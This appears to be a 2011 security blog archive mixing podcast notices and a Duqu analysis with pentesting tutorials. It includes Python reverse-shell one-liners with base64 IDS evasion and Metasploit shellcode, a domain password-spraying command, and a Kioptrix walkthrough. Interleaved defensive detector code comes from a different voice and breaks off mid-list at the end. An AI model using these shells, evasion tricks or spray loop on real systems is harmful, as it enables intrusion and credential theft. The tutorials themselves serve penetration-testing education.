October 2011 Archives

Hack Naked TV Episode 16


In this episode we talk about the 12 hour marathon, SSL and how hackers are trying to be more like classic 80's movies.

Links for this episode:

  • Do something good

  • Hackers take over Satellites

  • More SSL awesomeness



    Reading this article was an exercise in frustration. Mass SQL Injection Attack Hits 1 Million Sites. The sum of it is that over a million ASP.Net websites were written and put online after someone had deliberately disabled input validation. This isn't an insecure default. Folks turned off the security feature on purpose!

    I've worked on a lot of software projects and can picture what probably happened all too well. Someone was working on some piece of the web application and ran into a validation error when testing the site. Maybe they had a deadline coming up, or just gave up figuring the problem out. Hopefully it wasn't a case where they just didn't care. The end result was rather than figure out what triggered the issue and work through it, someone brought up the idea of turning off the validation.

    It was a small change. Just flip this:

    <%@ Language="C#" ValidateRequest="true" %>

    to this:

    <%@ Language="C#" ValidateRequest="false" %>


    Hey it works! At least until they got owned. Then it was lots of stress, work and fear of unemployment.

    This is not a problem limited to ASP.Net developers. Think back and remember the times that a firewall rule was set to default permit because someone was in a hurry. Or the time that someone got frustrated figuring out file system permissions and gave the Everyone group Full Control to a directory. Or worse, set that daemon to run as root. It happens, and it's all too tempting while in full firefighting mode or coming up on a deadline. But is it really worth it? Or do we find out later that the Easy Button really was the wrong one?


    Take some time and save yourself or co-workers the grief. Resist the urge to push the Easy Button and don't give an attacker an easy shot.

    What Does Duqu Actually Do?


    There's been a lot of chatter this week about Duqu and what it's actually aimed at accomplishing. I started off with Darren's link in the show notes to a Network World article titled "Symantec, McAfee differ on Duqu threat". After spending some time reading through different articles I focused on three by Symantec, McAfee and Kaspersky that had very different takes on Duqu. The links for each are below. It seems that there is some agreement on characteristics of Duqu, but a lot less on what it is aimed at doing.

    First, here's what Symantec, McAfee and Kaspersky agreed on.

    Duqu is Stuxnet related. Symantec stated that the authors had access to the Stuxnet source code. McAfee said that it was the Stuxnet team because it attacked small certificate authorities in the "Canis Aureus" region. Oh, and the code of Duqu was Stuxnet related. (Their order, not mine.) Kaspersky simply stated that the code and functionality was similar and let it go at that.

    One of the Duqu files was a signed driver purporting to be from C-Media Electronics. McAfee called these "stolen digital certificates". VeriSign revoked the certificate for this driver on October 14, 2011. Other drivers were not signed.

    Symantec and McAfee agree remote access and key logging are two of its capabilities. Kaspersky only mentioned the keylogger.


    But then we get to what it's actually for...


    Fox News decided it was the "hydrogen bomb of cyberwarfare". How's that for a purpose?


    Symantec states that Duqu's purpose is to "gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party." The main payload is for general remote access.

    McAfee also says that it is aimed at espionage and "targeted attacks against sites such as Certificate Authorities (CAs)." At the end of their article they issued a warning specific to CAs to carefully check their systems.

    Kaspersky took a different approach and didn't guess at Duqu's purpose. Instead they gave information about the four Duqu drivers that they have, stated that they had only one confirmed infection (as of Oct 20, 2011), and said they were continuing to investigate.

    Between the three articles there is information that could be used to look for signs of Duqu on your hosts. File names, driver names and versions. HTTP and HTTPS used for communications. JPG files used as the data transfer method. The full paper from Symantec also includes registry paths that we could look for. However, these are only from the files that they have discovered so far. So while we have a bit of information to start checking our systems with, what it does is still a bit of a debate.


    Links:
    Symantec - W32.Duqu: The Precursor to the Next Stuxnet

    Symantec's full paper on Duqu

    McAfee - The Day of the Golden Jackal - The Next Tale in the Stuxnet Files: Duqu

    Kaspersky - The Mystery of Duqu - Part One

    Fox News - Stuxnet Clone 'Duqu': The Hydrogen Bomb of Cyberwarfare? Nothing like a little hyperventilation to make it interesting.

    Hack Naked TV Episode 15


    In this edition we discuss sheep, the TDL4 root kit, and the RSA attacks… Because we just can't get enough of that APT good stuff!

    Links for this episode:

  • Anonymous does something good for a change
  • Who else got hit in the RSA attacks?
  • TDL4 gets an upgrade



    This Friday, October 28th, we'll be broadcasting live a special 12 hour podcast - Episode 265 with very special guests Johnny Long, Kevin Mitnick, Marcus Ranum, and a plethora of other awesome folks. The live stream will be broadcast at 10:00 AM EDT and our drive for Hackers for Charity will be in full effect until the mics are turned off sometime around 10:00 PM EDT that night.

    Episode 265 is dedicated to raising both awareness of, and funds for, Johnny Long's excellent organization Hackers for Charity.


    The HFC group:

    - Feeds children through a "food for work" program.
    - Builds computer labs to help students learn skills and land jobs that are key to disrupting poverty's vicious cycle.
    - Provides technical assistance to charities that can't afford IT services.
    - Furnishes job experience and references to the Ugandan volunteers.

    You can get more involved via their website, or simply click the donate button below.


    Participate in our IRC channel or sit back and enjoy it live via the link below:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 265 show notes page.

    - Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, Mike Perez, and Jack Daniel.

    PaulDotCom Security Weekly Episode 264


    Part 1 - Interview with Mike Poor and Tom Liston:

    Part 2 - Drunken Security News:

    Episode 264 Show Notes

    Episode 264 Part 1 Direct Audio Download

    Episode 264 Part 2 Direct Audio Download

    Episode Hosts:

  • Paul Asadoorian

  • Jack Daniel

  • Larry Pesce

  • John Strand

  • Darren Wigley
  • Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.


    Python One Line Shellcode


    You have remote command execution on a Linux web server. Your normal tricks for getting a shell don't work, but you know that the system has a fully functional Python interpreter. In order to make your attack work you need to put the entire attack into a single command line passed to a Python interpreter with the -c option. Here are a few Python-based one-liners that can be executed with the -c option, and tips for creating additional shells. Each of these examples shovels a shell to localhost. Start up a netcat listener to receive the shell ($nc -l -p 9000) before launching these sample attacks.

    First we start out with a simple python reverse tcp connect shell like this one.


    import socket
    import subprocess
    # connect back to the netcat listener, then loop: read a command,
    # run it through the shell, and send stdout and stderr back
    s=socket.socket()
    s.connect(("127.0.0.1",9000))
    while 1:
        p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        s.send(p.stdout.read() + p.stderr.read())

    Then we try to collapse it down to one line by separating the existing lines with semicolons. That is simple enough, but there is a problem. Python relies on spacing to indicate the start and end of a code block. The while loop doesn't want to collapse to a single line. But we can get it down to two lines.

    >>> import socket;import subprocess ;s=socket.socket() ;s.connect(("127.0.0.1",9000)) 
    >>> while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE); s.send(p.stdout.read() + p.stderr.read())


    If you keep the spacing straight and put those two lines into an interactive python session it works properly. As soon as you try to collapse the two lines with a semicolon you get a syntax error. The good news is you can get around that with the "exec" method. Python's exec method is similar to "eval()" in javascript and we can use it to interpret a script with "\n" (new lines) in it to separate the lines. Using this technique we get the following one line python shell.

    markbaggett$ python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

    Set up a netcat listener on your localhost listening on port 9000 and this works very nicely. If we are going to use exec(), we might as well add a little IDS evasion to the mix and obscure our code. So let's drop into interactive Python and encode our payload.

    markbaggett$ python
    Python 2.5.1 (r251:54863, May 5 2011, 18:37:34)
    [GCC 4.0.1 (Apple Inc. build 5465)] on darwin
    Type "help", "copyright", "credits" or "license" for more information.
    >>> shellcode="import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())"
    >>> shellcode.encode("base64")
    'aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\n'

    Next we take the base64 encoded version of our payload and exec() that with the decode() method to turn it back into our script source before execution. Our one liner becomes this:

    markbaggett$ python -c "exec('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\n'.decode('base64'))"

    Now let's apply this technique to a Python shell that executes a payload from the Metasploit framework, such as the one I discussed on the SANS Penetration Testing Blog. With this technique I create a Python script that executes a payload from the Metasploit framework. In this example I'll use the OS X reverse TCP shell. After grabbing the stage1 bytes from "$./msfpayload osx/x86/shell_reverse_tcp LHOST=127.0.0.1 C" (see SANS blog) I built the following Python script.

    from ctypes import *
    reverse_shell = "\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80"
    memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell))
    shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shellcode()


    Spaces and carriage returns aren't a problem for this very simple script so with a few semicolons we get the following one liner. We don't need to use the "exec()" function since we don't need to interpret multiple lines.

    root# python -c "from ctypes import *;reverse_shell = \"\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80\";memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell));shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p));shellcode()"


    Before pressing enter on the shell above you will need to set up the framework multi/handler to receive the incoming shell. This time the shell is connecting back to the default port of 4444, so we set it up as follows:

    msf > use multi/handler
    msf exploit(handler) > set payload osx/x86/shell_reverse_tcp
    payload => osx/x86/shell_reverse_tcp
    msf exploit(handler) > set LHOST 127.0.0.1
    LHOST => 127.0.0.1
    msf exploit(handler) > exploit

    [*] Started reverse handler on 127.0.0.1:4444
    [*] Starting the payload handler...
    [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54471) at 2011-10-20 09:19:03 -0400

    id
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)

    If you want to go back and add the exec() function to encode this payload and avoid IDS keep in mind your payload may contain ASCII representations of NULL (0x00) characters. In ASCII it is harmless, but once you encode it you may have trouble decoding it. If you want to encode that payload run your output through msfencode and use the -b option to eliminate null characters from your payload.

    As an aside, it is worth noting that when you compile this to an exe with pyinstaller you create a Python interpreter with an ASCII representation of your script in it. Today no antivirus software detects the ASCII source code of Metasploit payloads as malicious. I'm just saying. There you go. Simple, but effective. :)
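
From the defender's side of the same trick, here is an added example (mine, not from Mark's post) of what a host-monitoring rule can do with a process command line: recognise a python -c invocation, peel off the exec('<base64>'.decode('base64')) wrapper the post uses for IDS evasion, and look in the decoded script for the socket-plus-subprocess pattern of a shovelled shell. The sample command lines, the regular expressions and the classify_cmdline/find_reverse_shells names are all constructed for this example.

```python
import base64
import re

# Constructed sample process command lines (not taken from the original post):
# a harmless python -c call, a plain one-liner that imports socket and
# subprocess like the post's shell, and the same snippet wrapped in
# exec('<base64>'.decode('base64')) the way the post obscures it.
PLAIN_SNIPPET = "import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))"
SAMPLE_CMDLINES = [
    'python -c "print(1+1)"',
    'python -c "%s"' % PLAIN_SNIPPET,
    'python -c "exec(\'%s\'.decode(\'base64\'))"'
    % base64.b64encode(PLAIN_SNIPPET.encode()).decode(),
]

# A python -c invocation: capture everything after -c as the script body.
PY_C = re.compile(r"^\S*python[\d.]*\s+-c\s+(.*)$", re.S)
# A quoted base64 literal fed to .decode('base64'); the character class admits
# the literal backslash-n pairs that Python 2's .encode('base64') leaves in.
B64_LITERAL = re.compile(
    r"['\"]([A-Za-z0-9+/=\\n]{16,})['\"]\s*\.decode\(\s*['\"]base64['\"]\s*\)")
# The shovel-a-shell signature: the socket and subprocess modules used together.
SHELL_SIGNATURE = re.compile(
    r"\bsocket\b.*\bsubprocess\b|\bsubprocess\b.*\bsocket\b", re.S)


def unwrap_base64(body):
    """Replace every '<base64>'.decode('base64') literal in body with the decoded
    text so the inner script can be inspected like a plain one-liner."""
    def _decode(m):
        raw = m.group(1).replace("\\n", "")
        try:
            return base64.b64decode(raw).decode("latin-1")
        except ValueError:
            return m.group(0)  # not valid base64: leave the literal untouched
    return B64_LITERAL.sub(_decode, body)


def classify_cmdline(cmdline):
    """Describe one command line: is it a python -c call, does its body hide a
    base64-encoded script, and does the (decoded) script carry the signature."""
    m = PY_C.match(cmdline)
    if not m:
        return {"python_c": False, "encoded": False, "reverse_shell": False}
    body = m.group(1)
    encoded = B64_LITERAL.search(body) is not None
    decoded = unwrap_base64(body)
    return {"python_c": True, "encoded": encoded,
            "reverse_shell": SHELL_SIGNATURE.search(decoded) is not None}


def find_reverse_shells(cmdlines):
    """Indices of the command lines that should raise an alert."""
    return [i for i, c in enumerate(cmdlines)
            if classify_cmdline(c)["reverse_shell"]]


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(classify_cmdline(cmd), cmd[:60])
```

The point of decoding before matching is that a signature written against the raw command line sees only base64 and never the word subprocess; the wrapper is cheap to undo, so undo it first.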

    Tweets - @markbaggett

    Join me and Ed Skoudis for SANS 560 Network Penetration Testing and Ethical Hacking vLive ! Starting January 10, 2012 (wow.. 2012 already) CLICK HERE for more information.

    Posted by Dennis Antunes
    Follow on Twitter! @antunesdennis

    Ahh, intentionally vulnerable distros... What better way to sharpen the knives in the drawer while avoiding the orange jumpsuit?

    In this post and the accompanying video, we'll get root on Kioptrix Lvl1. Sure, it's been done before (search YouTube), but my goal here is not only to show you how to take level one, but more importantly to show you how to organize your approach and processes so they scale beyond a single host, as well as what to do once you do have root (pilfer and pivot).

    This is how we do....

    First: My attack platform is of course BT5. Why? Because it has just about every tool you'll ever need and it just flat out rocks.

    Second: Organization. Following a sound PT methodology, I like to map my activities to, and store the resulting raw data in, a unique workspace per project. I first create a simple hierarchy of folders, then blaze through them using the almighty screen. Ah screen, I truly love screen and you will too. I have @jabra to thank for the initial introduction about 7 years ago. If you fall in love you can thank me (pretty sure you will).

    I use the following bash script and accompanying custom screenrc file to create a dedicated workspace for each new project. The script takes one argument, the top level directory to create. It creates this along with a number of subdirectories used for organizing collected data.
    #!/bin/bash
    # get_organized.sh: create a per-project workspace under /root and start
    # screen with a screenrc generated from my_screenrc_template.

    function startscreen
    {
        # Substitute the project name into the template. Using | as the sed
        # delimiter keeps a name containing / from breaking the expression.
        sed -e "s|changethis|$TOPLVL|g" my_screenrc_template > my_screenrc
        screen -c my_screenrc
    }

    if [ "$#" -ne 1 ]
    then
        echo "You must specify a top level directory: $0 tld"
        exit 1
    fi

    TOPLVL="$1"
    if [ -e "/root/$TOPLVL" ]
    then
        echo "$1 exists. Starting screen anyway." && sleep 2 && startscreen
    else
        # One directory per kind of collected data.
        mkdir -p "/root/$TOPLVL"/{exploits,nmap_scans,pilfering,reporting,webpen,wordlists}
        startscreen
    fi
    
    
    Using the default .screenrc, I simply appended the following lines and saved it off as my_screenrc_template. This file will be used by screen to initialize a number of different windows, each window starting in a different directory of the workspace. Note my get_organized.sh script generates a custom screenrc per project using this template. The relevant lines are below:
    setenv TOPLVL /root/changethis
    
    chdir "$TOPLVL"
    screen -h 2000 -t SHELL 
    
    chdir "$TOPLVL/nmap_scans"
    screen -h 2000 -t NMAP
    
    chdir "$TOPLVL/pilfering"
    screen -h 2000 -t PILFERING
    
    chdir "$TOPLVL/wordlists"
    screen -h 2000 -t WORDLISTS
    
    chdir "/pentest/exploits/exploitdb"
    screen -h 2000 -t EXPLOITDB
    
    chdir "$TOPLVL/exploits"
    screen -h 2000 -t EXPLOITS
    
    chdir "$TOPLVL/webpen"
    screen -h 2000 -t WEBPEN
    
    screen -h 2000 -t MSF msfconsole
    
    chdir "/ftphome"
    screen -h 2000 -t FTPHOME
    
    chdir "/srv/tftp"
    screen -h 2000 -t TFTP
    
    chdir "$TOPLVL/reporting"
    screen -h 2000 -t REPORTING
    
    This should make a lot more sense once you see the video.

    Third: The Repository: I use MSF as an attack platform, a payload encoder, and I would argue just as importantly, a repository. I input all my data: Nikto, nmap, nessus, etc. into MSF for easy perusal and retrieval. As you will see, I create a workspace for each new project, again for organization's sake.

    Fourth: The Exploit: Often the easiest part if we've mapped our target properly. In the video I use the CVE Details site to look up potential exploits based on the service versions uncovered.

    Fifth and finally: The pilfer and pivot. Because there is a single host here, we will focus on the pilfer, keeping in mind all good pivots start first with a good pilfer. I'll run my pilfer script for Linux (linkit.sh) which gathers just about all the info you will need to pivot from this host. This info also serves as an invaluable starting point in the event you are not root and need to escalate privileges.

    Best viewed in fullscreen/HD:

    Jack says!!!


    "Stuxnet and Duqu were created by the AV companies to eat the souls of children everywhere…"

    But I may be paraphrasing…

    That is all.

    I wonder if this will drive traffic.



    -strandjs

    p.s. Paul, that is three cigars.

    Hack Naked TV Episode 14



    In this episode we discuss the children of Stuxnet, how a company came to their senses in Australia and how Google is switching to SSL.

    Links for this episode:

  • Stuxnet Ripped off
  • Google Switching to SSL
  • Security researcher not being charged

    A while ago, Dave Hoelzer did a nice video on how to use Windows PowerShell to hack domain user accounts. Basically, Dave leveraged PowerShell commands which any domain user can execute on a domain and receive either a positive or negative response based on the legitimacy of the username and password combination. This got me thinking. Since I'm not typically handed, or able to spawn, a PowerShell right from the get go, what else could I use to accomplish the same goal? The answer is attempting to connect to the IPC$ share of a domain controller. Using the following command, you can spray a huge list of domain users with a small number of passwords (to avoid lockout) and try to catch someone using something simple.

    @FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\DC01 /user:mydomain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DC01\IPC$ > NUL

    WARNING: Make sure the number of passwords in your file is less than that of the account lockout policy. Below is a small list that Carnal0wnage and Mubix reference in their recent DerbyCon talk. This list, along with the technique used above, gets you in just about anywhere.

    HINT: For a list of all the users in a domain, conduct SID enumeration against null sessions with NBTEnum or Cain. While not always enabled, I rarely find null sessions disabled. If it is disabled, use typical info gathering techniques from open sources.

    Here's another use for this technique. Brute forcing the domain default password by targeting Active, never logged in accounts. You get this information for each user when you enumerate the domain with Cain / NBTEnum as mentioned above. Essentially what you have is a long list of users, all with the same default password, since they have never logged in with their accounts. Normally, I wouldn't think this a viable vector of attack, but I recently encountered a situation where a domain had over 1000 Active, never logged in accounts, all with the same default password. No joke. What you would do is attempt several passwords (lockout - 1) from a list against each user. In the situation I encountered, the lockout was 3 and there were ~1000 Active user accounts that had never logged in. That's 1000 * (3 - 1) = 2000 attempts I could have made at guessing the default user password without fear of locking out any accounts! Really wish I would have done that now...

    If you're looking for a single command which does this, look for it in a future episode of the Command Line Kung Fu blog.
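
As an added example from the defensive side (not part of this post), the same lockout arithmetic the post describes can be turned around into a detector: a spray shows up in the domain controller's failed-logon events as one source failing against many distinct accounts while keeping each account at or below (lockout - 1) attempts. The CSV records, the event-id constant and the detect_spray/accounts_at_risk names below are constructed for this example, not the format of any real log export.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records (not real event-log data). Each line is
# "timestamp,source_ip,target_user,event_id"; 4625 is the Windows failed-logon
# event, 4624 a success. 10.0.0.5 tries one password against six accounts and
# then a second password against two of them; 10.0.0.9 is one user mistyping
# their own password twice before getting in.
SAMPLE_LOG = """\
2011-10-20T09:00:01,10.0.0.5,alice,4625
2011-10-20T09:00:02,10.0.0.5,bob,4625
2011-10-20T09:00:03,10.0.0.5,carol,4625
2011-10-20T09:00:04,10.0.0.5,dave,4625
2011-10-20T09:00:05,10.0.0.5,erin,4625
2011-10-20T09:00:06,10.0.0.5,frank,4625
2011-10-20T09:01:01,10.0.0.5,alice,4625
2011-10-20T09:01:02,10.0.0.5,bob,4625
2011-10-20T09:05:00,10.0.0.9,grace,4625
2011-10-20T09:05:30,10.0.0.9,grace,4625
2011-10-20T09:06:00,10.0.0.9,grace,4624
"""

FAILED_LOGON = 4625


def parse_log(text):
    """Parse the CSV records into (timestamp, source_ip, user, event_id) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, event = line.split(",")
        records.append((datetime.fromisoformat(ts), src, user, int(event)))
    return records


def failures_per_account(records):
    """Failed logons per account. A spray that respects the lockout policy keeps
    every one of these at or below (lockout threshold - 1)."""
    return Counter(user for _, _, user, ev in records if ev == FAILED_LOGON)


def detect_spray(records, window=timedelta(minutes=10), min_users=5):
    """Flag sources that fail against at least min_users distinct accounts inside
    any window-sized span. Returns {source_ip: distinct_users_seen}."""
    by_src = defaultdict(list)
    for ts, src, user, ev in records:
        if ev == FAILED_LOGON:
            by_src[src].append((ts, user))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                alerts[src] = len(users)
                break
    return alerts


def accounts_at_risk(records, lockout_threshold):
    """Accounts one more failure away from lockout: shows whether a spray stopped
    exactly at (lockout - 1) attempts per account, as the post's arithmetic does."""
    return sorted(u for u, n in failures_per_account(records).items()
                  if n >= lockout_threshold - 1)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("spray sources:", detect_spray(recs))
    print("near lockout (threshold 3):", accounts_at_risk(recs, 3))
```

Per-account failure counts on their own never fire, which is exactly why the post's trick works against lockout-based monitoring; the distinct-accounts-per-source view is the one that catches it.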

    PaulDotCom Security Weekly Episode 263


    Part 1 - Interview with Dave Porcello, CEO of Pwnie Express:

    Part 2 - Interview with Rich Perkins and Mike Tassey on DIY UAVs:

    Part 3 - Drunken Security News for the Week:

    Episode 262 Show Notes

    Episode 263 Part 1 Direct Audio Download

    Episode 263 Part 2 Direct Audio Download

    Episode 263 Part 3 Direct Audio Download

    Episode Hosts:

  • Paul Asadoorian

  • Jack Daniel

  • Larry Pesce

  • John Strand

  • Darren Wigley
  • Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.


    Hack Naked TV Episode 13


    Welcome to another episode of Hack Naked TV.

    In this episode we learn that being a good security researcher will not always be returned with kindness and respect. We learn that Joe Pesci may be a role model for how to run user awareness programs everywhere. And finally, we look at some SEC guidelines that will make lawyers everywhere smile.

    Links for this episode:


  • New SEC guidelines on reporting breaches

  • US Drone fleet infected through Mafia Wars

  • Security Researcher threatened for finding Vulnerabilities

    UPDATE: We're changing our schedule to start at 6pm EDT! Look for us at our new time from now on.

    Join us this Thursday night - we have longtime friend of the show and InGuardians' Mike Poor stopping by again in Episode 264 to update us on his current projects.

    Participate in our IRC channel or sit back and enjoy it live via the link below:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 264 show notes page.

    - Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, Mike Perez, and Jack Daniel.

    In Search Of Evil User Agents


    Here is another great post from Doug Burks.

    For the purposes of this blog post, "evil User Agents" could be truly
    evil User Agents like "Bob's Evil Clown C&C Agent" or they could
    simply be outdated and vulnerable browser software like
    "Firefox/2.0.0.20".



    Proxy

    If you already proxy your outbound HTTP traffic, then this a trivial
    exercise of just parsing your existing proxy logs. This is left as an
    exercise to the reader, but the command-line kung-fu at the bottom of
    this blog post may help you get started. If you don't already have a
    proxy, read on for some other ideas.

    WPAD

    WPAD is Web Proxy Auto Discovery. By default, most browsers will
    attempt to retrieve a proxy configuration file from a local WPAD
    server. Even if you don't have a proxy server, you can create a
    "wpad" A record in your internal DNS and point it at a web server
    where you can monitor the logs. You don't have to add a proxy
    configuration file to the web server, just let the clients request the
    file and then query the web server logs for their User Agent strings.
    This isn't a 100% solution as some malware may not try to connect to
    WPAD. [1] [2]

    httpry

    If you can span or tap your outbound Internet traffic to a box running
    the httpry utility [3], it will create logs very similar to a proxy
    but without requiring any reconfiguration of your network or clients
    [4] [5]. A recent update to Security Onion added httpry and
    configured it to run on all monitored interfaces, so you can have full
    IDS/NSM *and* searchable HTTP logs in one box [6].

    httpry's output format is configurable. If you want just the client
    IP and User Agent, you can configure httpry to log just those fields.
    If running httpry in Security Onion, it logs in the following format:
    timestamp,source-ip,source-port,dest-ip,dest-port,method,host,request-uri,referer,user-agent
    (for uploading into Sguil [7]). We can use our old friends cut, awk,
    sort, and uniq to pare this down to just client IP and User Agent to
    produce an actionable report:

    cut -f2,10 /nsm/sensor_data/*/httpry/`date +%Y-%m-%d`.log | awk '$2 != "-"' | sort | uniq -c | sort -nr

    Let's break the command down:

    cut -f2,10 /nsm/sensor_data/*/httpry/`date +%Y-%m-%d`.log
    Security Onion stores its httpry logs in
    /nsm/sensor_data/NAME_OF_SENSOR/httpry/YYYY-MM-DD.log (where
    NAME_OF_SENSOR is the actual sensor name and YYYY-MM-DD is the actual
    date). We can get today's date in YYYY-MM-DD format using the
    backticked command `date +%Y-%m-%d`. So the full command extracts
    fields 2 and 10 from today's log on all sensors on the box.
    | awk '$2 != "-"'
    Take the output from the cut command and remove lines where the User
    Agent field is just a hyphen.

    | sort | uniq -c |sort -nr
    Take the output from the awk command, sort the logs by IP address and
    collapse them into unique entries (giving a count of each unique entry
    at the beginning of the line), and then sort in reverse numerical
    format. This puts our User Agents with the highest amount of traffic
    on top.

    Here's some sample output:

     2701 192.0.2.2  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2)
    AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
    1024 192.0.2.8 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
    rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
    992 192.0.2.3 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1
    (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
    39 192.0.2.4 Mozilla/5.0 (X11; U; Linux i686; en-US;
    rv:1.9.2.23) Gecko/20110921 Ubuntu/10.04 (lucid) Firefox/3.6.23
    78 192.0.2.4 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1
    (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
    11 192.0.2.5 Roku/DVP-3.0 (013.00E02227A)
    5 192.0.2.4 Wget/1.12 (linux-gnu)
    3 192.0.2.4 Bob's Evil Clown C&C Agent
    2 192.0.2.4 curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7
    OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15

    On the second line of the output, we see that 192.0.2.8 is running the
    vulnerable Firefox 2.0.0.20 browser. On the next to last line of the
    output, we find Bob's Evil Clown C&C Agent on 192.0.2.4.
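
Here is an added example (not Doug's code) that does the cut/awk/sort/uniq pipeline above in Python over a few constructed httpry lines in the Security Onion field order, then applies the two checks the post is after: an outdated Firefox major version and a User Agent that matches no known client prefix. The sample lines, the Firefox version floor and the KNOWN_PREFIXES allowlist are assumptions for the example; tune the allowlist to what your site actually runs.

```python
import re
from collections import Counter

# httpry field order as configured on Security Onion (from the post).
FIELDS = ["timestamp", "source-ip", "source-port", "dest-ip", "dest-port",
          "method", "host", "request-uri", "referer", "user-agent"]

# Constructed sample log lines in httpry's tab-separated layout (not real
# sensor data); the client IPs and agents mirror the post's sample report.
SAMPLE_HTTPRY = "\n".join("\t".join(f) for f in [
    ["2011-10-20 09:00:01", "192.0.2.2", "50123", "198.51.100.7", "80", "GET", "example.com", "/", "-",
     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"],
    ["2011-10-20 09:00:02", "192.0.2.2", "50124", "198.51.100.7", "80", "GET", "example.com", "/logo.png", "http://example.com/",
     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"],
    ["2011-10-20 09:00:03", "192.0.2.8", "50125", "198.51.100.7", "80", "GET", "example.com", "/", "-",
     "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"],
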